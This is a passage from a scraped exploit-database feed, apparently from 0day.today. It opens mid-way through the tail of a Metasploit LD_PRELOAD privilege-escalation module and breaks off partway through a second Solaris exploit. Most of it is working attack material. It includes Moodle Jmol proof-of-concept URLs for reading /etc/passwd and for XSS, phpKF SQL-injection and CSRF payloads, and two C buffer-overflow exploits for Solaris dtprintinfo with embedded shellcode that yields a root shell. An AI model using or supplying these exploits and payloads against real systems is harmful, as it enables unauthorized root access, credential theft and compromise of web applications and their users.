CheckCode::Safe\r\n end\r\n print_good 'gcc is installed'\r\n\r\n unless setuid? suid_exe_path\r\n vprint_error \"#{suid_exe_path} is not setuid\"\r\n return CheckCode::Detected\r\n end\r\n vprint_good \"#{suid_exe_path} is setuid\"\r\n\r\n CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Appears\r\n unless datastore['ForceExploit']\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\r\n end\r\n print_warning 'Target does not appear to be vulnerable'\r\n end\r\n\r\n if is_root?\r\n unless datastore['ForceExploit']\r\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\r\n end\r\n end\r\n\r\n unless writable? base_dir\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n\r\n if base_dir.length > 1_000\r\n fail_with Failure::BadConfig, \"#{base_dir} path length #{base_dir.length} is larger than 1,000\"\r\n end\r\n\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\"\r\n\r\n executable_data = <<-EOF\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n\r\nvoid _init() {\r\n extern char **environ;\r\n environ=NULL;\r\n system(\"#{payload_path} &\");\r\n}\r\nEOF\r\n\r\n executable_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\"\r\n upload \"#{executable_path}.c\", executable_data\r\n output = cmd_exec \"gcc -o #{executable_path}.o -c #{executable_path}.c -fPIC -Wall\"\r\n register_file_for_cleanup \"#{executable_path}.o\"\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{executable_path}.c failed to compile\"\r\n end\r\n\r\n lib_name = \".#{rand_text_alphanumeric 5..10}\"\r\n lib_path = \"#{base_dir}/#{lib_name}\"\r\n output = cmd_exec \"gcc -shared -Wall,-soname,#{lib_name}.0 #{executable_path}.o -o #{lib_path}.0 -nostartfiles\"\r\n register_file_for_cleanup \"#{lib_path}.0\"\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{executable_path}.o failed to compile\"\r\n end\r\n\r\n exploit_data = <<-EOF\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\nint main() {\r\n extern char **environ;\r\n environ = (char**)calloc(8096, sizeof(char));\r\n\r\n environ[0] = (char*)calloc(1024, sizeof(char));\r\n environ[1] = (char*)calloc(1024, sizeof(char));\r\n strcpy(environ[1], \"LD_PRELOAD=#{lib_path}.0\");\r\n\r\n return execl(\"#{suid_exe_path}\", \"\", (char *)0);\r\n}\r\nEOF\r\n\r\n exploit_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\"\r\n upload \"#{exploit_path}.c\", exploit_data\r\n output = cmd_exec \"gcc #{exploit_path}.c -o #{exploit_path} -Wall\"\r\n register_file_for_cleanup exploit_path\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{exploit_path}.c failed to compile\"\r\n end\r\n\r\n upload payload_path, generate_payload_exe\r\n chmod payload_path\r\n\r\n print_status 'Launching exploit...'\r\n output = cmd_exec exploit_path\r\n output.each_line { |line| vprint_status line.chomp }\r\n end\r\nend\n\n# 0day.today [2019-05-22] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/32767"}, {"lastseen": "2019-05-22T13:56:25", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-05-21T00:00:00", "published": "2019-05-21T00:00:00", "id": "1337DAY-ID-32751", "href": "https://0day.today/exploit/description/32751", "title": "Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting Vulnerabilities", "type": "zdt", "sourceData": "# Exploit Title: Moodle filter_jmol multiple vulnerabilities (Directory Traversal and XSS)\r\n# Exploit Author: Dionach Ltd\r\n# Exploit Author Homepage: https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities\r\n# Software Link: https://moodle.org/plugins/filter_jmol\r\n# Version: <=6.1\r\n# Tested on: Debian\r\n\r\nThe Jmol/JSmol plugin for the Moodle Learning Management System displays chemical structures in Moodle using Java and JavaScript. The plugin implements a PHP server-side proxy in order to load third party resources bypassing client-side security restrictions. This PHP proxy script calls the function file_get_contents() on unvalidated user input.\r\n\r\nThis makes Moodle instances with this plugin installed vulnerable to directory traversal and server-side request forgery in the default PHP setup, and if PHP's \"expect\" wrapper is enabled, also to remote code execution. Other parameters in the plugin are also vulnerable to reflected cross-site scripting. Note that authentication is not required to exploit these vulnerabilities.\r\n\r\nThe JSmol Moodle plugin was forked from the JSmol project, where the directory traversal and server-side request forgery vulnerability was partially fixed in 2015.\r\n\r\n* Plugin: https://moodle.org/plugins/pluginversions.php?plugin=filter_jmol\r\n* Note on functionality: https://github.com/geoffrowland/moodle-filter_jmol/blob/master/js/jsmol/php/jsmol.php#L14\r\n* Vulnerability announcement: https://sourceforge.net/p/jmol/mailman/message/33627649/\r\n* Partial fix: https://sourceforge.net/p/jsmol/code/1004/\r\n\r\nThis issue is tracked at the following URLs:\r\nhttps://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities\r\nhttps://tracker.moodle.org/browse/CONTRIB-7516\r\n\r\nCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:F/RL:W/RC:C\r\n\r\n== Proof of Concept ==\r\n\r\n1. Directory traversal\r\nhttp://<moodle>/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd\r\n2. Reflected cross-site scripting\r\nhttp://<moodle>/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html\r\nhttp://<moodle>/filter/jmol/iframe.php?_USE=%22};alert(%27XSS%27);//\r\n3. Malware distribution\r\nhttp://<moodle>/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&encoding=base64&data=UEsFBgAAAAAAAAAAAAAAAAAAAAAAAA%3D%3D&filename=empty.zip\n\n# 0day.today [2019-05-22] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32751"}, {"lastseen": "2019-05-21T12:32:19", "bulletinFamily": "exploit", "description": "phpKF version 1.10 suffers from cross site request forgery, cross site scripting, and remote SQL injection vulnerabilities.", "modified": "2019-05-21T00:00:00", "published": "2019-05-21T00:00:00", "id": "1337DAY-ID-32749", "href": "https://0day.today/exploit/description/32749", "title": "phpKF 1.10 XSS / CSRF / SQL Injection Vulnerabilities", "type": "zdt", "sourceData": "# Exploit Title: phpKF - Multi Vulnerabilities (XSS , SQLi , CSRF)\r\n# Google Dork: Yaz\u0131l\u0131m: phpKF \u00a9 2007-2019\r\n# Exploit Author: Ahmethan GULTEKIN ~ @inject0r16 (b4)\r\n# Vendor Homepage: https://www.phpkf.com/\r\n# Software Link: https://www.phpkf.com/indirme.php\r\n# Version: 1.10\r\n# Tested on: Windows 7-8-10 & Parrot OS\r\n# CVE : none\r\n\r\n\r\n*SQL Injection:*\r\n\r\nURL: phpkf-yonetim/phpkf-bilesenler/guvenlik.php\r\n\r\nLine : 69\r\n\r\n$vtsorgu = \"SELECT\r\nid,yonetim_kimlik,kullanici_kimlik,yetki,son_hareket,kul_ip FROM\r\n$tablo_kullanicilar WHERE yonetim_kimlik='$_COOKIE[yonetim_kimlik]' AND\r\nkullanici_kimlik='$_COOKIE[kullanici_kimlik]' LIMIT 1\";\r\n\r\npayload:\r\n%bf%27 UNION SELECT sifre FROM phpkfcms_kullanicilar WHERE id='1\r\n\r\n\r\n\r\n\r\n*XSS Injection:*\r\n\r\nURL: /uye-profil.php?kp=degistir\r\n\r\n\r\n*payload*: <script>alert(1)</script>\r\n\r\n*injectable area* : Imza and Hakkinda\r\n\r\n\r\ninjected screenshot:\r\nhttps://resimag.com/p1/87f45db571d.png\r\nhttps://resimag.com/p1/a6a31f8aae8.png\r\n\r\n\r\n*CSRF Vuln:*\r\n\r\nThis is so interested vuln. Because what you enter as a parameter, it is\r\ndownloading as a file.\r\n\r\n*POC*:\r\n\r\n<form action = \"http://{YOURHOST}/phpkf-cms/phpkf-kurulum/guncelle.php\"\r\nmethod = \"POST\">\r\n<input type = \"hidden\" name = \"kurulum_yapildi\" value = \"ayar_dosyasi\">\r\n<input type = \"hidden\" name = \"ayar_bilgi\" value = \"<?=phpinfo();?>\">\r\n<input type = \"submit\" value = \"git\">\r\n</form>\r\n<span>b4style</span>\r\n\r\n\r\nscreenshot:\r\nhttps://resimag.com/p1/30442c329ad.png\r\n\r\n#MoreThanYourImagine! - GrayCorpz Sec.\n\n# 0day.today [2019-05-21] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32749"}, {"lastseen": "2019-05-20T23:54:43", "bulletinFamily": "exploit", "description": "Exploit for solaris platform in category local exploits", "modified": "2019-05-20T00:00:00", "published": "2019-05-20T00:00:00", "id": "1337DAY-ID-32717", "href": "https://0day.today/exploit/description/32717", "title": "Solaris 7/8/9 (#SPARC) - (dtprintinfo) Local Privilege Escalation (2) Exploit", "type": "zdt", "sourceData": "/*\r\n * raptor_dtprintname_sparc2.c - dtprintinfo 0day, Solaris/SPARC\r\n * Copyright (c) 2004-2019 Marco Ivaldi <[email\u00a0protected]>\r\n *\r\n * 0day buffer overflow in the dtprintinfo(1) CDE Print Viewer, leading to\r\n * local root. Many thanks to Dave Aitel for discovering this vulnerability\r\n * and for his interesting research activities on Solaris/SPARC.\r\n *\r\n * \"None of my dtprintinfo work is public, other than that 0day pack being\r\n * leaked to all hell and back. It should all basically still work. Let's\r\n * keep it that way, cool? :>\" -- Dave Aitel\r\n *\r\n * This is the ret-into-ld.so version of raptor_dtprintname_sparc.c, able \r\n * to bypass the non-executable stack protection (noexec_user_stack=1 in \r\n * /etc/system).\r\n *\r\n * NOTE. If experiencing troubles with null-bytes inside the ld.so.1 memory \r\n * space, use sprintf() instead of strcpy() (tested on some Solaris 7 boxes).\r\n *\r\n * Usage:\r\n * $ gcc raptor_dtprintname_sparc2.c -o raptor_dtprintname_sparc2 -ldl -Wall\r\n * [on your xserver: disable the access control]\r\n * $ ./raptor_dtprintname_sparc2 192.168.1.1:0\r\n * [...]\r\n * # id\r\n * uid=0(root) gid=10(staff)\r\n * #\r\n *\r\n * Tested on:\r\n * SunOS 5.7 Generic_106541-21 sun4u sparc SUNW,Ultra-1\r\n * SunOS 5.8 Generic_108528-13 sun4u sparc SUNW,Ultra-5_10\r\n * SunOS 5.9 Generic sun4u sparc SUNW,Ultra-5_10\r\n * [SunOS 5.10 is also vulnerable, the exploit might require some tweaking]\r\n */\r\n\r\n#include <dlfcn.h>\r\n#include <fcntl.h>\r\n#include <link.h>\r\n#include <procfs.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <strings.h>\r\n#include <unistd.h>\r\n#include <sys/systeminfo.h>\r\n\r\n#define INFO1\t\"raptor_dtprintname_sparc2.c - dtprintinfo 0day, Solaris/SPARC\"\r\n#define INFO2\t\"Copyright (c) 2004-2019 Marco Ivaldi <[email\u00a0protected]>\"\r\n\r\n#define\tVULN\t\"/usr/dt/bin/dtprintinfo\"\t// the vulnerable program\r\n#define\tBUFSIZE\t301\t\t\t\t// size of the printer name\r\n#define\tFFSIZE\t64 + 1\t\t\t\t// size of the fake frame\r\n#define\tDUMMY\t0xdeadbeef\t\t\t// dummy memory address\r\n\r\n/* voodoo macros */\r\n#define\tVOODOO32(_,__,___)\t{_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}\r\n#define\tVOODOO64(_,__,___)\t{_+=7-(_+(__+___+1)*4+3)%8;}\r\n\r\nchar sc[] = /* Solaris/SPARC shellcode (12 + 12 + 48 = 72 bytes) */\r\n/* double setuid() */\r\n\"\\x90\\x08\\x3f\\xff\\x82\\x10\\x20\\x17\\x91\\xd0\\x20\\x08\"\r\n\"\\x90\\x08\\x3f\\xff\\x82\\x10\\x20\\x17\\x91\\xd0\\x20\\x08\"\r\n/* execve() */\r\n\"\\x20\\xbf\\xff\\xff\\x20\\xbf\\xff\\xff\\x7f\\xff\\xff\\xff\\x90\\x03\\xe0\\x20\"\r\n\"\\x92\\x02\\x20\\x10\\xc0\\x22\\x20\\x08\\xd0\\x22\\x20\\x10\\xc0\\x22\\x20\\x14\"\r\n\"\\x82\\x10\\x20\\x0b\\x91\\xd0\\x20\\x08/bin/ksh\";\r\n\r\n/* globals */\r\nchar\t*env[256];\r\nint\tenv_pos = 0, env_len = 0;\r\n\r\n/* prototypes */\r\nint\tadd_env(char *string);\r\nvoid\tcheck_zero(int addr, char *pattern);\r\nint\tsearch_ldso(char *sym);\r\nint\tsearch_rwx_mem(void);\r\nvoid\tset_val(char *buf, int pos, int val);\r\n\r\n/*\r\n * main()\r\n */\r\nint main(int argc, char **argv)\r\n{\r\n\tchar\tbuf[BUFSIZE], ff[FFSIZE], ret_var[16], fpt_var[16];\r\n\tchar\tplatform[256], release[256], display[256];\r\n\tint\ti, offset, ff_addr, sc_addr, ret_pos, fpt_pos;\r\n\tint\tplat_len, prog_len, rel;\r\n\r\n\tchar\t*arg[2] = {\"foo\", NULL};\r\n\tint\targ_len = 4, arg_pos = 1;\r\n\r\n\tint\tsb = ((int)argv[0] | 0xffff) & 0xfffffffc;\r\n\tint\tret = search_ldso(\"strcpy\");\t/* or sprintf */\r\n\tint\trwx_mem = search_rwx_mem();\r\n\r\n\t/* fake lpstat code */\r\n\tif (!strcmp(argv[0], \"lpstat\")) {\r\n\r\n\t\t/* check command line */\r\n\t\tif (argc != 2)\r\n\t\t\texit(1);\r\n\r\n\t\t/* get ret and fake frame addresses from environment */\r\n\t\tret = (int)strtoul(getenv(\"RET\"), (char **)NULL, 0);\r\n\t\tff_addr = (int)strtoul(getenv(\"FPT\"), (char **)NULL, 0);\r\n\r\n\t\t/* prepare the evil printer name */\r\n\t\tmemset(buf, 'A', sizeof(buf));\r\n\t\tbuf[sizeof(buf) - 1] = 0x0;\r\n\r\n\t\t/* fill with return and fake frame addresses */\r\n\t\tfor (i = 0; i < BUFSIZE; i += 4) {\r\n\t\t\t/* apparently, we don't need to bruteforce */\r\n\t\t\tset_val(buf, i, ret - 4);\r\n\t\t\tset_val(buf, i += 4, ff_addr);\r\n\t\t}\r\n\r\n\t\t/* print the expected output and exit */\r\n\t\tif(!strcmp(argv[1], \"-v\")) {\r\n\t\t\tfprintf(stderr, \"lpstat called with -v\\n\");\r\n\t\t\tprintf(\"device for %s: /dev/null\\n\", buf);\r\n\t\t} else {\r\n\t\t\tfprintf(stderr, \"lpstat called with -d\\n\");\r\n\t\t\tprintf(\"system default destination: %s\\n\", buf);\r\n\t\t}\r\n\t\texit(0);\r\n\t}\r\n\r\n\t/* print exploit information */\r\n\tfprintf(stderr, \"%s\\n%s\\n\\n\", INFO1, INFO2);\r\n\r\n\t/* read command line */\r\n\tif (argc != 2) {\r\n\t\tfprintf(stderr, \"usage: %s xserver:display\\n\\n\", argv[0]);\r\n\t\texit(1);\r\n\t}\r\n\tsprintf(display, \"DISPLAY=%s\", argv[1]);\r\n\r\n\t/* get some system information */\r\n\tsysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);\r\n\tsysinfo(SI_RELEASE, release, sizeof(release) - 1);\r\n\trel = atoi(release + 2);\r\n\r\n\t/* prepare the fake frame */\r\n\tbzero(ff, sizeof(ff));\r\n\r\n\t/*\r\n\t * saved %l registers\r\n\t */\r\n\tset_val(ff, i = 0, DUMMY);\t\t/* %l0 */\r\n\tset_val(ff, i += 4, DUMMY);\t\t/* %l1 */\r\n\tset_val(ff, i += 4, DUMMY);\t\t/* %l2 */\r\n\tset_val(ff, i += 4, DUMMY);\t\t/* %l3 */\r\n\tset_val(ff, i += 4, DUMMY);\t\t/* %l4 */\r\n\tset_val(ff, i += 4, DUMMY);\t\t/* %l5 */\r\n\tset_val(ff, i += 4, DUMMY);\t\t/* %l6 */\r\n\tset_val(ff, i += 4, DUMMY);\t\t/* %l7 */\r\n\r\n\t/*\r\n\t * saved %i registers\r\n\t */\r\n\tset_val(ff, i += 4, rwx_mem);\t\t/* %i0: 1st arg to strcpy() */\r\n\tset_val(ff, i += 4, 0x42424242);\t/* %i1: 2nd arg to strcpy() */\r\n\tset_val(ff, i += 4, DUMMY);\t\t/* %i2 */\r\n\tset_val(ff, i += 4, DUMMY);\t\t/* %i3 */\r\n\tset_val(ff, i += 4, DUMMY);\t\t/* %i4 */\r\n\tset_val(ff, i += 4, DUMMY);\t\t/* %i5 */\r\n\tset_val(ff, i += 4, sb - 1000);\t\t/* %i6: frame pointer */\r\n\tset_val(ff, i += 4, rwx_mem - 8);\t/* %i7: return address */\r\n\r\n\t/* fill the envp, keeping padding */\r\n\tsc_addr = add_env(ff);\r\n\tadd_env(sc);\r\n\tret_pos = env_pos;\r\n\tadd_env(\"RET=0x41414141\");\r\n\tfpt_pos = env_pos;\r\n\tadd_env(\"FPT=0x42424242\");\r\n\tadd_env(display);\r\n\tadd_env(\"PATH=.:/usr/bin\");\r\n\tadd_env(\"HOME=/tmp\");\r\n\tadd_env(NULL);\r\n\r\n\t/* calculate the offset to argv[0] (voodoo magic) */\r\n\tplat_len = strlen(platform) + 1;\r\n\tprog_len = strlen(VULN) + 1;\r\n\toffset = arg_len + env_len + plat_len + prog_len;\r\n\tif (rel > 7)\r\n\t\tVOODOO64(offset, arg_pos, env_pos)\r\n\telse\r\n\t\tVOODOO32(offset, plat_len, prog_len)\r\n\r\n\t/* calculate the needed addresses */\r\n\tff_addr = sb - offset + arg_len;\r\n\tsc_addr += ff_addr;\r\n\r\n\t/* set fake frame's %i1 */\r\n\tset_val(ff, 36, sc_addr);\t\t/* 2nd arg to strcpy() */\r\n\r\n\t/* overwrite RET and FPT env vars with the right addresses */\r\n\tsprintf(ret_var, \"RET=0x%x\", ret);\r\n\tenv[ret_pos] = ret_var;\r\n\tsprintf(fpt_var, \"FPT=0x%x\", ff_addr);\r\n\tenv[fpt_pos] = fpt_var;\r\n\r\n\t/* create a symlink for the fake lpstat */\r\n\tunlink(\"lpstat\");\r\n\tsymlink(argv[0], \"lpstat\");\r\n\r\n\t/* print some output */\r\n\tfprintf(stderr, \"Using SI_PLATFORM\\t: %s (%s)\\n\", platform, release);\r\n\tfprintf(stderr, \"Using stack base\\t: 0x%p\\n\", (void *)sb);\r\n\tfprintf(stderr, \"Using rwx_mem address\\t: 0x%p\\n\", (void *)rwx_mem);\r\n\tfprintf(stderr, \"Using sc address\\t: 0x%p\\n\", (void *)sc_addr);\r\n\tfprintf(stderr, \"Using ff address\\t: 0x%p\\n\", (void *)ff_addr);\r\n\tfprintf(stderr, \"Using strcpy() address\\t: 0x%p\\n\\n\", (void *)ret);\r\n\r\n\t/* run the vulnerable program */\r\n\texecve(VULN, arg, env);\r\n\tperror(\"execve\");\r\n\texit(0);\r\n}\r\n\r\n/*\r\n * add_env(): add a variable to envp and pad if needed\r\n */\r\nint add_env(char *string)\r\n{\r\n\tint\ti;\r\n\r\n\t/* null termination */\r\n\tif (!string) {\r\n\t\tenv[env_pos] = NULL;\r\n\t\treturn(env_len);\r\n\t}\r\n\r\n\t/* add the variable to envp */\r\n\tenv[env_pos] = string;\r\n\tenv_len += strlen(string) + 1;\r\n\tenv_pos++;\r\n\r\n\t/* pad the envp using zeroes */\r\n\tif ((strlen(string) + 1) % 4)\r\n\t\tfor (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {\r\n\t\t\tenv[env_pos] = string + strlen(string);\r\n\t\t\tenv_len++;\r\n\t\t}\r\n\r\n\treturn(env_len);\r\n}\r\n\r\n/*\r\n * check_zero(): check an address for the presence of a 0x00\r\n */\r\nvoid check_zero(int addr, char *pattern)\r\n{\r\n\tif (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||\r\n\t !(addr & 0xff000000)) {\r\n\t\tfprintf(stderr, \"Error: %s contains a 0x00!\\n\", pattern);\r\n\t\texit(1);\r\n\t}\r\n}\r\n\r\n/*\r\n * search_ldso(): search for a symbol inside ld.so.1\r\n */\r\nint search_ldso(char *sym)\r\n{\r\n\tint\t\taddr;\r\n\tvoid\t\t*handle;\r\n\tLink_map\t*lm;\r\n\r\n\t/* open the executable object file */\r\n\tif ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {\r\n\t\tperror(\"dlopen\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\t/* get dynamic load information */\r\n\tif ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {\r\n\t\tperror(\"dlinfo\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\t/* search for the address of the symbol */\r\n\tif ((addr = (int)dlsym(handle, sym)) == NULL) {\r\n\t\tfprintf(stderr, \"sorry, function %s() not found\\n\", sym);\r\n\t\texit(1);\r\n\t}\r\n\r\n\t/* close the executable object file */\r\n\tdlclose(handle);\r\n\r\n\tcheck_zero(addr - 4, sym);\r\n\treturn(addr);\r\n}\r\n\r\n/*\r\n * search_rwx_mem(): search for an RWX memory segment valid for all\r\n * programs (typically, /usr/lib/ld.so.1) using the proc filesystem\r\n */\r\nint search_rwx_mem(void)\r\n{\r\n\tint\tfd;\r\n\tchar\ttmp[16];\r\n\tprmap_t\tmap;\r\n\tint\taddr = 0, addr_old;\r\n\r\n\t/* open the proc filesystem */\r\n\tsprintf(tmp,\"/proc/%d/map\", (int)getpid());\r\n\tif ((fd = open(tmp, O_RDONLY)) < 0) {\r\n\t\tfprintf(stderr, \"can't open %s\\n\", tmp);\r\n\t\texit(1);\r\n\t}\r\n\r\n\t/* search for the last RWX memory segment before stack (last - 1) */\r\n\twhile (read(fd, &map, sizeof(map)))\r\n\t\tif (map.pr_vaddr)\r\n\t\t\tif (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {\r\n\t\t\t\taddr_old = addr;\r\n\t\t\t\taddr = map.pr_vaddr;\r\n\t\t\t}\r\n\tclose(fd);\r\n\r\n\t/* add 4 to the exact address NULL bytes */\r\n\tif (!(addr_old & 0xff))\r\n\t\taddr_old |= 0x04;\r\n\tif (!(addr_old & 0xff00))\r\n\t\taddr_old |= 0x0400;\r\n\r\n\treturn(addr_old);\r\n}\r\n\r\n/*\r\n * set_val(): copy a dword inside a buffer\r\n */\r\nvoid set_val(char *buf, int pos, int val)\r\n{\r\n\tbuf[pos] =\t(val & 0xff000000) >> 24;\r\n\tbuf[pos + 1] =\t(val & 0x00ff0000) >> 16;\r\n\tbuf[pos + 2] =\t(val & 0x0000ff00) >> 8;\r\n\tbuf[pos + 3] =\t(val & 0x000000ff);\r\n}\n\n# 0day.today [2019-05-20] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32717"}, {"lastseen": "2019-05-20T23:54:37", "bulletinFamily": "exploit", "description": "Exploit for solaris platform in category local exploits", "modified": "2019-05-20T00:00:00", "published": "2019-05-20T00:00:00", "id": "1337DAY-ID-32716", "href": "https://0day.today/exploit/description/32716", "title": "Solaris 7/8/9 (#SPARC) - (dtprintinfo) Local Privilege Escalation (1) Exploit", "type": "zdt", "sourceData": "/*\r\n * raptor_dtprintname_sparc.c - dtprintinfo 0day, Solaris/SPARC\r\n * Copyright (c) 2004-2019 Marco Ivaldi <[email\u00a0protected]>\r\n *\r\n * 0day buffer overflow in the dtprintinfo(1) CDE Print Viewer, leading to\r\n * local root. Many thanks to Dave Aitel for discovering this vulnerability\r\n * and for his interesting research activities on Solaris/SPARC.\r\n *\r\n * \"None of my dtprintinfo work is public, other than that 0day pack being\r\n * leaked to all hell and back. It should all basically still work. Let's\r\n * keep it that way, cool? :>\" -- Dave Aitel\r\n *\r\n * Usage:\r\n * $ gcc raptor_dtprintname_sparc.c -o raptor_dtprintname_sparc -Wall\r\n * [on your xserver: disable the access control]\r\n * $ ./raptor_dtprintname_sparc 192.168.1.1:0\r\n * [...]\r\n * # id\r\n * uid=0(root) gid=10(staff)\r\n * #\r\n *\r\n * Tested on:\r\n * SunOS 5.7 Generic_106541-21 sun4u sparc SUNW,Ultra-1\r\n * SunOS 5.8 Generic_108528-13 sun4u sparc SUNW,Ultra-5_10\r\n * SunOS 5.9 Generic sun4u sparc SUNW,Ultra-5_10\r\n * [SunOS 5.10 is also vulnerable, the exploit might require some tweaking]\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <strings.h>\r\n#include <unistd.h>\r\n#include <sys/systeminfo.h>\r\n\r\n#define INFO1\t\"raptor_dtprintname_sparc.c - dtprintinfo 0day, Solaris/SPARC\"\r\n#define INFO2\t\"Copyright (c) 2004-2019 Marco Ivaldi <[email\u00a0protected]>\"\r\n\r\n#define\tVULN\t\"/usr/dt/bin/dtprintinfo\"\t// the vulnerable program\r\n#define\tBUFSIZE\t301\t\t\t\t// size of the printer name\r\n\r\n/* voodoo macros */\r\n#define\tVOODOO32(_,__,___)\t{_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}\r\n#define\tVOODOO64(_,__,___)\t{_+=7-(_+(__+___+1)*4+3)%8;}\r\n\r\nchar sc[] = /* Solaris/SPARC shellcode (12 + 12 + 48 = 72 bytes) */\r\n/* double setuid() */\r\n\"\\x90\\x08\\x3f\\xff\\x82\\x10\\x20\\x17\\x91\\xd0\\x20\\x08\"\r\n\"\\x90\\x08\\x3f\\xff\\x82\\x10\\x20\\x17\\x91\\xd0\\x20\\x08\"\r\n/* execve() */\r\n\"\\x20\\xbf\\xff\\xff\\x20\\xbf\\xff\\xff\\x7f\\xff\\xff\\xff\\x90\\x03\\xe0\\x20\"\r\n\"\\x92\\x02\\x20\\x10\\xc0\\x22\\x20\\x08\\xd0\\x22\\x20\\x10\\xc0\\x22\\x20\\x14\"\r\n\"\\x82\\x10\\x20\\x0b\\x91\\xd0\\x20\\x08/bin/ksh\";\r\n\r\n/* globals */\r\nchar\t*env[256];\r\nint\tenv_pos = 0, env_len = 0;\r\n\r\n/* prototypes */\r\nint\tadd_env(char *string);\r\nvoid\tset_val(char *buf, int pos, int val);\r\n\r\n/*\r\n * main()\r\n */\r\nint main(int argc, char **argv)\r\n{\r\n\tchar\tbuf[BUFSIZE], var[16];\r\n\tchar\tplatform[256], release[256], display[256];\r\n\tint\ti, offset, ret, var_pos;\r\n\tint\tplat_len, prog_len, rel;\r\n\r\n\tchar\t*arg[2] = {\"foo\", NULL};\r\n\tint\targ_len = 4, arg_pos = 1;\r\n\r\n\tint\tsb = ((int)argv[0] | 0xffff) & 0xfffffffc;\r\n\r\n\t/* fake lpstat code */\r\n\tif (!strcmp(argv[0], \"lpstat\")) {\r\n\r\n\t\t/* check command line */\r\n\t\tif (argc != 2)\r\n\t\t\texit(1);\r\n\r\n\t\t/* get ret address from environment */\r\n\t\tret = (int)strtoul(getenv(\"RET\"), (char **)NULL, 0);\r\n\r\n\t\t/* prepare the evil printer name */\r\n\t\tmemset(buf, 'A', sizeof(buf));\r\n\t\tbuf[sizeof(buf) - 1] = 0x0;\r\n\r\n\t\t/* fill with return address */\r\n\t\tfor (i = 0; i < BUFSIZE; i += 4)\r\n\t\t\tset_val(buf, i, ret - 8);\r\n\r\n\t\t/* print the expected output and exit */\r\n\t\tif(!strcmp(argv[1], \"-v\")) {\r\n\t\t\tfprintf(stderr, \"lpstat called with -v\\n\");\r\n\t\t\tprintf(\"device for %s: /dev/null\\n\", buf);\r\n\t\t} else {\r\n\t\t\tfprintf(stderr, \"lpstat called with -d\\n\");\r\n\t\t\tprintf(\"system default destination: %s\\n\", buf);\r\n\t\t}\r\n\t\texit(0);\r\n\t}\r\n\r\n\t/* print exploit information */\r\n\tfprintf(stderr, \"%s\\n%s\\n\\n\", INFO1, INFO2);\r\n\r\n\t/* read command line */\r\n\tif (argc != 2) {\r\n\t\tfprintf(stderr, \"usage: %s xserver:display\\n\\n\", argv[0]);\r\n\t\texit(1);\r\n\t}\r\n\tsprintf(display, \"DISPLAY=%s\", argv[1]);\r\n\r\n\t/* get some system information */\r\n\tsysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);\r\n\tsysinfo(SI_RELEASE, release, sizeof(release) - 1);\r\n\trel = atoi(release + 2);\r\n\r\n\t/* fill the envp, keeping padding */\r\n\tadd_env(sc);\r\n\tvar_pos = env_pos;\r\n\tadd_env(\"RET=0x41414141\");\r\n\tadd_env(display);\r\n\tadd_env(\"PATH=.:/usr/bin\");\r\n\tadd_env(\"HOME=/tmp\");\r\n\tadd_env(NULL);\r\n\r\n\t/* calculate the offset to argv[0] (voodoo magic) */\r\n\tplat_len = strlen(platform) + 1;\r\n\tprog_len = strlen(VULN) + 1;\r\n\toffset = arg_len + env_len + plat_len + prog_len;\r\n\tif (rel > 7)\r\n\t\tVOODOO64(offset, arg_pos, env_pos)\r\n\telse\r\n\t\tVOODOO32(offset, plat_len, prog_len)\r\n\r\n\t/* calculate the needed addresses */\r\n\tret = sb - offset + arg_len;\r\n\r\n\t/* overwrite the RET env var with the right ret address */\r\n\tsprintf(var, \"RET=0x%x\", ret);\r\n\tenv[var_pos] = var;\r\n\r\n\t/* create a symlink for the fake lpstat */\r\n\tunlink(\"lpstat\");\r\n\tsymlink(argv[0], \"lpstat\");\r\n\r\n\t/* print some output */\r\n\tfprintf(stderr, \"Using SI_PLATFORM\\t: %s (%s)\\n\", platform, release);\r\n\tfprintf(stderr, \"Using stack base\\t: 0x%p\\n\", (void *)sb);\r\n\tfprintf(stderr, \"Using ret address\\t: 0x%p\\n\\n\", (void 